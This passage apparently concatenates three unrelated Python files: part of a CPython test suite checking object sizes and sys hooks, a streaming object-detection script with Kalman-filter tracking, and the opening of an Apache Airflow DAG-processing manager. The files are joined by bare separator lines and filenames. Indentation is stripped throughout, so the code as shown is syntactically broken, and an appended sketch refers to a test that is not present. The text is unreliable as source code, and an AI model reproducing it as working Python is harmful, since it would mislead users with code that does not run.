check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2n15Pl4Pn9Pn11PIP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
# Separate block for PyDictKeysObject with 8 keys and 5 entries
s += calcsize("2nP2n") + 8 + 5*calcsize("n2P")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P' + '2nP2n'))
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
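# --- Illustrative sketch (not part of the test suite) ---
# A compact, standalone demonstration of the sys.intern() behaviour exercised
# by test_intern() above: interning a fresh string returns that very object,
# later equal strings resolve to it, and str subclasses are rejected.
def _intern_demo():
    s = "a string that has never been interned before 12345"
    assert sys.intern(s) is s                        # s itself enters the table
    assert sys.intern(s.swapcase().swapcase()) is s  # an equal copy maps back to s
    class S(str):
        pass
    try:
        sys.intern(S("abc"))
    except TypeError:
        pass  # subclasses of str cannot be interned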
|
streamer.py
|
'''
Our meta-detector Streamer
It converts a detector into a streaming perception system with a fixed output rate
'''
import argparse, json, pickle
from os.path import join, isfile, basename
from glob import glob
from time import perf_counter
import multiprocessing as mp
import traceback
from tqdm import tqdm
import numpy as np
import torch
from pycocotools.coco import COCO
# the line below is for running in both the current directory
# and the repo's root directory
import sys; sys.path.insert(0, '..'); sys.path.insert(0, '.')
from util import mkdir2, print_stats
from util.bbox import ltrb2ltwh_, ltwh2ltrb_
from util.runtime_dist import dist_from_dict
from det import imread, parse_det_result
from det.det_apis import init_detector, inference_detector
from track import track_based_shuffle
# from track import iou_assoc
from track.iou_assoc_cp import iou_assoc
from forecast import extrap_clean_up
from forecast.pps_forecast_kf import \
bbox2z, bbox2x, x2bbox, make_F, make_Q, \
batch_kf_predict_only, batch_kf_predict, \
batch_kf_update
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--data-root', type=str, required=True)
parser.add_argument('--annot-path', type=str, required=True)
parser.add_argument('--fps', type=float, default=30)
parser.add_argument('--eta', type=float, default=0, help='eta >= -1') # frame
parser.add_argument('--config', type=str, required=True)
parser.add_argument('--weights', type=str, required=True)
parser.add_argument('--in-scale', type=float, default=None)
parser.add_argument('--no-mask', action='store_true', default=False)
parser.add_argument('--cpu-pre', action='store_true', default=False)
parser.add_argument('--dynamic-schedule', action='store_true', default=False)
parser.add_argument('--runtime', type=str, required=True)
parser.add_argument('--perf-factor', type=float, default=1)
parser.add_argument('--match-iou-th', type=float, default=0.3)
parser.add_argument('--forecast-rt-ub', type=float, default=0.003) # seconds
parser.add_argument('--out-dir', type=str, required=True)
parser.add_argument('--overwrite', action='store_true', default=False)
opts = parser.parse_args()
return opts
def det_process(opts, frame_recv, det_res_send, w_img, h_img):
try:
model = init_detector(opts)
# warm up the GPU
_ = inference_detector(model, np.zeros((h_img, w_img, 3), np.uint8))
torch.cuda.synchronize()
while 1:
fidx = frame_recv.recv()
if type(fidx) is list:
# new video, read all images in advance
frame_list = fidx
frames = [imread(img_path) for img_path in frame_list]
# signal ready, no errors
det_res_send.send('ready')
continue
elif fidx is None:
# exit flag
break
fidx, t1 = fidx
img = frames[fidx]
t2 = perf_counter()
t_send_frame = t2 - t1
result = inference_detector(model, img, gpu_pre=not opts.cpu_pre)
torch.cuda.synchronize()
t3 = perf_counter()
det_res_send.send([result, t_send_frame, t3])
except Exception:
# report all errors from the child process to the parent
# forward traceback info as well
det_res_send.send(Exception("".join(traceback.format_exception(*sys.exc_info()))))
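# --- Illustrative sketch (not part of the pipeline) ---
# The parent/child protocol implemented by det_process() above, in compact
# form. On the frame pipe the parent sends either a list of image paths
# (preload a new video), an (index, timestamp) tuple (run detection on that
# frame), or None (exit). On the result pipe the child replies with 'ready',
# with a [result, t_send_frame, t_done] triple, or with a forwarded Exception.
# The function and its arguments are hypothetical helpers, not part of main().
def _detector_protocol_sketch(frame_send, det_res_recv, img_paths):
    frame_send.send(img_paths)                # child preloads the video
    msg = det_res_recv.recv()
    if isinstance(msg, Exception):
        raise msg                             # errors are re-raised here
    assert msg == 'ready'
    frame_send.send((0, perf_counter()))      # request detection on frame 0
    msg = det_res_recv.recv()
    if isinstance(msg, Exception):
        raise msg
    result, t_send_frame, t_done = msg
    frame_send.send(None)                     # tell the child to exit
    return result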
def main():
assert torch.cuda.device_count() == 1 # mmdet only supports single GPU testing
opts = parse_args()
mkdir2(opts.out_dir)
db = COCO(opts.annot_path)
class_names = [c['name'] for c in db.dataset['categories']]
n_class = len(class_names)
coco_mapping = db.dataset.get('coco_mapping', None)
if coco_mapping is not None:
coco_mapping = np.asarray(coco_mapping)
seqs = db.dataset['sequences']
seq_dirs = db.dataset['seq_dirs']
img = db.imgs[0]
w_img, h_img = img['width'], img['height']
mp.set_start_method('spawn')
frame_recv, frame_send = mp.Pipe(False)
det_res_recv, det_res_send = mp.Pipe(False)
det_proc = mp.Process(target=det_process, args=(opts, frame_recv, det_res_send, w_img, h_img))
det_proc.start()
if opts.dynamic_schedule:
runtime = pickle.load(open(opts.runtime, 'rb'))
runtime_dist = dist_from_dict(runtime, opts.perf_factor)
mean_rtf = runtime_dist.mean()*opts.fps
n_total = 0
t_det_all = []
t_send_frame_all = []
t_recv_res_all = []
t_assoc_all = []
t_forecast_all = []
with torch.no_grad():
kf_F = torch.eye(8)
kf_Q = torch.eye(8)
kf_R = 10*torch.eye(4)
kf_P_init = 100*torch.eye(8).unsqueeze(0)
for sid, seq in enumerate(tqdm(seqs)):
frame_list = [img for img in db.imgs.values() if img['sid'] == sid]
frame_list = [join(opts.data_root, seq_dirs[sid], img['name']) for img in frame_list]
n_frame = len(frame_list)
n_total += n_frame
timestamps = []
results_parsed = []
input_fidx = []
processing = False
fidx_t2 = None # detection input index at t2
fidx_latest = None
tkidx = 0 # track starting index
kf_x = torch.empty((0, 8, 1))
kf_P = torch.empty((0, 8, 8))
n_matched12 = 0
# let the detector process read all the frames
frame_send.send(frame_list)
# it is possible that unfetched results remain in the pipe
while 1:
msg = det_res_recv.recv() # wait till the detector is ready
if msg == 'ready':
break
elif isinstance(msg, Exception):
raise msg
t_total = n_frame/opts.fps
t_unit = 1/opts.fps
t_start = perf_counter()
while 1:
t1 = perf_counter()
t_elapsed = t1 - t_start
if t_elapsed >= t_total:
break
# identify latest available frame
fidx_continous = t_elapsed*opts.fps
fidx = int(np.floor(fidx_continous))
if fidx == fidx_latest:
# algorithm is fast and has some idle time
wait_for_next = True
else:
wait_for_next = False
if opts.dynamic_schedule:
if mean_rtf >= 1:
# when the mean runtime is under one frame, every frame should be processed
fidx_remainder = fidx_continous - fidx
if mean_rtf < np.floor(fidx_remainder + mean_rtf):
# wait till next frame
wait_for_next = True
if wait_for_next:
# sleep
continue
if not processing:
t_start_frame = perf_counter()
frame_send.send((fidx, t_start_frame))
fidx_latest = fidx
processing = True
# wait until the next query time, minus the forecasting runtime upper bound
wait_time = t_unit - opts.forecast_rt_ub
if det_res_recv.poll(wait_time): # wait
# new result
result = det_res_recv.recv()
if isinstance(result, Exception):
raise result
result, t_send_frame, t_start_res = result
bboxes_t2, scores_t2, labels_t2, _ = \
parse_det_result(result, coco_mapping, n_class)
processing = False
t_det_end = perf_counter()
t_det_all.append(t_det_end - t_start_frame)
t_send_frame_all.append(t_send_frame)
t_recv_res_all.append(t_det_end - t_start_res)
# associate across frames
t_assoc_start = perf_counter()
if len(kf_x):
dt = fidx_latest - fidx_t2
kf_F = make_F(kf_F, dt)
kf_Q = make_Q(kf_Q, dt)
kf_x, kf_P = batch_kf_predict(kf_F, kf_x, kf_P, kf_Q)
bboxes_f = x2bbox(kf_x)
fidx_t2 = fidx_latest
n = len(bboxes_t2)
if n:
# put high-score detections first for better IoU matching
score_argsort = np.argsort(scores_t2)[::-1]
bboxes_t2 = bboxes_t2[score_argsort]
scores_t2 = scores_t2[score_argsort]
labels_t2 = labels_t2[score_argsort]
ltrb2ltwh_(bboxes_t2)
updated = False
if len(kf_x):
order1, order2, n_matched12, tracks, tkidx = iou_assoc(
bboxes_f, labels, tracks, tkidx,
bboxes_t2, labels_t2, opts.match_iou_th,
no_unmatched1=True,
)
if n_matched12:
kf_x = kf_x[order1]
kf_P = kf_P[order1]
kf_x, kf_P = batch_kf_update(
bbox2z(bboxes_t2[order2[:n_matched12]]),
kf_x,
kf_P,
kf_R,
)
kf_x_new = bbox2x(bboxes_t2[order2[n_matched12:]])
n_unmatched2 = len(bboxes_t2) - n_matched12
kf_P_new = kf_P_init.expand(n_unmatched2, -1, -1)
kf_x = torch.cat((kf_x, kf_x_new))
kf_P = torch.cat((kf_P, kf_P_new))
labels = labels_t2[order2]
scores = scores_t2[order2]
updated = True
if not updated:
# start from scratch
kf_x = bbox2x(bboxes_t2)
kf_P = kf_P_init.expand(len(bboxes_t2), -1, -1)
labels = labels_t2
scores = scores_t2
tracks = np.arange(tkidx, tkidx + n, dtype=np.uint32)
tkidx += n
t_assoc_end = perf_counter()
t_assoc_all.append(t_assoc_end - t_assoc_start)
# apply forecasting for the current query
t_forecast_start = perf_counter()
query_pointer = fidx + opts.eta + 1
if len(kf_x):
dt = (query_pointer - fidx_t2)
kf_x_np = kf_x[:, :, 0].numpy()
bboxes_t3 = kf_x_np[:n_matched12, :4] + dt*kf_x_np[:n_matched12, 4:]
if n_matched12 < len(kf_x):
bboxes_t3 = np.concatenate((bboxes_t3, kf_x_np[n_matched12:, :4]))
bboxes_t3, keep = extrap_clean_up(bboxes_t3, w_img, h_img, lt=True)
labels_t3 = labels[keep]
scores_t3 = scores[keep]
tracks_t3 = tracks[keep]
else:
bboxes_t3 = np.empty((0, 4), dtype=np.float32)
scores_t3 = np.empty((0,), dtype=np.float32)
labels_t3 = np.empty((0,), dtype=np.int32)
tracks_t3 = np.empty((0,), dtype=np.int32)
t_forecast_end = perf_counter()
t_forecast_all.append(t_forecast_end - t_forecast_start)
t3 = perf_counter()
t_elapsed = t3 - t_start
if t_elapsed >= t_total:
break
if len(bboxes_t3):
ltwh2ltrb_(bboxes_t3)
if fidx_t2 is not None:
timestamps.append(t_elapsed)
results_parsed.append((bboxes_t3, scores_t3, labels_t3, None, tracks_t3))
input_fidx.append(fidx_t2)
out_path = join(opts.out_dir, seq + '.pkl')
if opts.overwrite or not isfile(out_path):
pickle.dump({
'results_parsed': results_parsed,
'timestamps': timestamps,
'input_fidx': input_fidx,
}, open(out_path, 'wb'))
# terminate the child process
frame_send.send(None)
out_path = join(opts.out_dir, 'time_info.pkl')
if opts.overwrite or not isfile(out_path):
pickle.dump({
'n_total': n_total,
't_det': t_det_all,
't_send_frame': t_send_frame_all,
't_recv_res': t_recv_res_all,
't_assoc': t_assoc_all,
't_forecast': t_forecast_all,
}, open(out_path, 'wb'))
# convert to ms for display
s2ms = lambda x: 1e3*x
print_stats(t_det_all, 'Runtime detection (ms)', cvt=s2ms)
print_stats(t_send_frame_all, 'Runtime sending the frame (ms)', cvt=s2ms)
print_stats(t_recv_res_all, 'Runtime receiving the result (ms)', cvt=s2ms)
print_stats(t_assoc_all, "Runtime association (ms)", cvt=s2ms)
print_stats(t_forecast_all, "Runtime forecasting (ms)", cvt=s2ms)
if __name__ == '__main__':
main()
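# --- Illustrative sketch (not part of the pipeline) ---
# The dynamic-scheduling rule used inside main() above, pulled out into a
# standalone helper for clarity. Given the detector's mean runtime expressed
# in frames (mean_rtf) and the fractional frame index derived from elapsed
# time, it decides whether to process the latest frame now or idle until the
# next frame arrives. The function name is hypothetical; the logic mirrors
# the in-line code.
def should_wait_for_next_frame(mean_rtf, fidx_continuous):
    if mean_rtf < 1:
        # a faster-than-real-time detector should simply process every frame
        return False
    fidx = int(np.floor(fidx_continuous))
    fidx_remainder = fidx_continuous - fidx
    # if the job would not finish until a later frame interval anyway, it is
    # better to idle and process a fresher frame at the next boundary
    return mean_rtf < np.floor(fidx_remainder + mean_rtf)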
|
manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
import zipfile
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy.orm import Session
from tabulate import tabulate
import airflow.models
from airflow.callbacks.callback_requests import CallbackRequest
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, DbCallbackRequest, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths, might_contain_dag
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG-parsing-related
jobs in the scheduler process. Mainly it spins up DagFileProcessorManager
in a subprocess, collects DAG parsing results from it and exchanges
signals and DAG parsing stats with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: Whether to start agent in async mode
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when the DAG file processor manager has been launched in sync mode.
Send the agent heartbeat signal to the manager, requesting that it run one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died because of an error then it will be noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def get_callbacks_pipe(self) -> MultiprocessingConnection:
"""Returns the pipe for sending Callbacks to DagProcessorManager."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
return self._parent_signal_conn
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-processes of this process at the OS level, rather than
# having to iterate over the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with the parent process.
# This process may need custom configurations that cannot be shared (e.g. a
# RotatingFileHandler), and connections can be corrupted if we do not
# recreate the SQLAlchemy connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
# TODO: This reloading should be removed when we fix our logging behaviour
# In case of "spawn" method of starting processes for multiprocessing, reinitializing of the
# SQLAlchemy engine causes extremely unexpected behaviour of messing with objects already loaded
# in a parent process (likely via resources shared in memory by the ORM libraries).
# This caused flaky tests in our CI for many months and has been discovered while
# iterating on https://github.com/apache/airflow/pull/19860
# The issue that describes the problem and possible remediation is
# at https://github.com/apache/airflow/issues/19934
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
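# Hedged usage sketch (not in the original module): the helper below shows how a
# scheduler-like caller might drive DagFileProcessorAgent in sync mode. It assumes
# the agent constructor takes the same arguments that are forwarded to
# _run_processor_manager above; the DAG directory is a placeholder.
def _example_drive_agent_in_sync_mode(dag_directory: str = "/tmp/dags") -> None:
    agent = DagFileProcessorAgent(
        dag_directory=dag_directory,
        max_runs=1,
        processor_timeout=timedelta(seconds=60),
        dag_ids=None,
        pickle_dags=False,
        async_mode=False,
    )
    agent.start()
    # In sync mode each parsing "loop" must be requested explicitly.
    agent.run_single_parsing_loop()
    agent.wait_until_finished()
    # heartbeat() drains pending DagParsingStat messages and restarts the manager
    # process if it died unexpectedly.
    agent.heartbeat()
    agent.end()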
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results into a multiprocessing.Queue
